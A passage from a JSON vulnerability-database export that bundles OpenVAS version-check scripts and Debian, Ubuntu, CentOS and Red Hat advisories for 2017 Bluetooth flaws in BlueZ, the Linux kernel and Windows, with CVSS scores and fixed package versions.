script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1103-1] bluez security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:53:48 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00020.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"bluez on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\");\n script_tag(name:\"summary\", value:\"The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive information\nfrom the bluetoothd process memory. This vulnerability lies in the processing\nof SDP search attribute requests.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bluetooth\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-alsa\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-audio\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-compat\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-cups\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-dbg\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-gstreamer\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-pcmcia-support\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-utils\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth-dev\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3-dbg\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "scanner", "description": "This host is missing an important security\n update according to Microsoft KB4034786", "modified": "2019-05-03T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811675", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811675", "title": "Microsoft Bluetooth Driver Spoofing Vulnerability (KB4034786)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Bluetooth Driver Spoofing Vulnerability (KB4034786)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811675\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-8628\");\n script_bugtraq_id(100744);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 09:59:18 +0530 (Wed, 13 Sep 2017)\");\n script_name(\"Microsoft Bluetooth Driver Spoofing Vulnerability (KB4034786)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4034786\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists in Microsoft's implementation\n of the Bluetooth stack.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to perform a man-in-the-middle attack and force a user's computer to unknowingly\n route traffic through the attacker's computer.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4034786\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"bthpan.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.0.6002.19848\")){\n Vulnerable_range = \"Less than 6.0.6002.19848\";\n}\n\nelse if(version_in_range(version:fileVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24168\")){\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24168\";\n}\n\nif(Vulnerable_range)\n{\n report = 'File checked: ' + sysPath + \"\\bthpan.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:A/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811769", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811769", "title": "RedHat Update for kernel RHSA-2017:2681-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2681-01_kernel.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for kernel RHSA-2017:2681-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811769\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:15:48 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000251\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:2681-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel,\nthe core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A stack buffer overflow flaw was found in the way the Bluetooth subsystem\nof the Linux kernel processed pending L2CAP configuration responses from a\nclient. On systems with the stack protection feature enabled in the kernel\n(CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other\nthan s390x and ppc64[le]), an unauthenticated attacker able to initiate a\nconnection to a system via Bluetooth could use this flaw to crash the\nsystem. Due to the nature of the stack protection feature, code execution\ncannot be fully ruled out, although we believe it is unlikely. On systems\nwithout the stack protection feature (ppc64[le] the Bluetooth modules are\nnot built on s390x), an unauthenticated attacker able to initiate a\nconnection to a system via Bluetooth could use this flaw to remotely\nexecute arbitrary code on the system with ring 0 (kernel) privileges.\n(CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"kernel on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2681-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-September/msg00027.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~696.10.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "scanner", "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310882766", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882766", "title": "CentOS Update for kernel CESA-2017:2681 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2681_kernel_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for kernel CESA-2017:2681 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882766\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:16:28 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000251\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2017:2681 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A stack buffer overflow flaw was found in the way the Bluetooth subsystem\nof the Linux kernel processed pending L2CAP configuration responses from a\nclient. On systems with the stack protection feature enabled in the kernel\n(CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other\nthan s390x and ppc64[le]), an unauthenticated attacker able to initiate a\nconnection to a system via Bluetooth could use this flaw to crash the\nsystem. Due to the nature of the stack protection feature, code execution\ncannot be fully ruled out, although we believe it is unlikely. On systems\nwithout the stack protection feature (ppc64[le] the Bluetooth modules are\nnot built on s390x), an unauthenticated attacker able to initiate a\nconnection to a system via Bluetooth could use this flaw to remotely\nexecute arbitrary code on the system with ring 0 (kernel) privileges.\n(CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2681\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-September/022530.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~696.10.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:32", "bulletinFamily": "unix", "description": "It was discovered that an information disclosure vulnerability existed in the Service Discovery Protocol (SDP) implementation in BlueZ. A physically proximate unauthenticated attacker could use this to disclose sensitive information. (CVE-2017-1000250)", "modified": "2017-09-12T00:00:00", "published": "2017-09-12T00:00:00", "id": "USN-3413-1", "href": "https://usn.ubuntu.com/3413-1/", "title": "BlueZ vulnerability", "type": "ubuntu", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T19:20:52", "bulletinFamily": "unix", "description": "It was discovered that a buffer overflow existed in the Bluetooth stack of the Linux kernel when handling L2CAP configuration responses. A physically proximate attacker could use this to cause a denial of service (system crash).", "modified": "2017-09-18T00:00:00", "published": "2017-09-18T00:00:00", "id": "USN-3423-1", "href": "https://usn.ubuntu.com/3423-1/", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-05-29T18:33:36", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:2685\n\n\nThe bluez packages contain the following utilities for use in Bluetooth applications: hcitool, hciattach, hciconfig, bluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n* An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-September/022531.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-September/022535.html\n\n**Affected packages:**\nbluez\nbluez-alsa\nbluez-compat\nbluez-cups\nbluez-gstreamer\nbluez-hid2hci\nbluez-libs\nbluez-libs-devel\n\n**Upstream details at:**\n", "modified": "2017-09-13T21:18:50", "published": "2017-09-12T23:15:38", "href": "http://lists.centos.org/pipermail/centos-announce/2017-September/022531.html", "id": "CESA-2017:2685", "title": "bluez security update", "type": "centos", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:57", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:2679\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-September/022536.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\n", "modified": "2017-09-13T21:20:33", "published": "2017-09-13T21:20:33", "href": "http://lists.centos.org/pipermail/centos-announce/2017-September/022536.html", "id": "CESA-2017:2679", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:2681\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-September/022530.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\n", "modified": "2017-09-12T23:15:02", "published": "2017-09-12T23:15:02", "href": "http://lists.centos.org/pipermail/centos-announce/2017-September/022530.html", "id": "CESA-2017:2681", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:22:36", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3972-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 13, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bluez\nCVE ID : CVE-2017-1000250\nDebian Bug : 875633\n\nAn information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker to\nobtain sensitive information from bluetoothd process memory, including\nBluetooth encryption keys.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 5.23-2+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 5.43-2+deb9u1.\n\nWe recommend that you upgrade your bluez packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2017-09-13T11:54:19", "published": "2017-09-13T11:54:19", "id": "DEBIAN:DSA-3972-1:ACF5D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00234.html", "title": "[SECURITY] [DSA 3972-1] bluez security update", "type": "debian", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:23:01", "bulletinFamily": "unix", "description": "Package : bluez\nVersion : 4.99-2+deb7u1\nCVE ID : CVE-2017-1000250\nDebian Bug : 875633\n\nThe SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive information\nfrom the bluetoothd process memory. This vulnerability lies in the processing\nof SDP search attribute requests.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2017-09-21T21:01:41", "published": "2017-09-21T21:01:41", "id": "DEBIAN:DLA-1103-1:B4D85", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00020.html", "title": "[SECURITY] [DLA 1103-1] bluez security update", "type": "debian", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "description": "The bluez packages contain the following utilities for use in Bluetooth applications: hcitool, hciattach, hciconfig, bluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n* An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2018-06-07T18:22:24", "published": "2017-09-12T18:08:48", "id": "RHSA-2017:2685", "href": 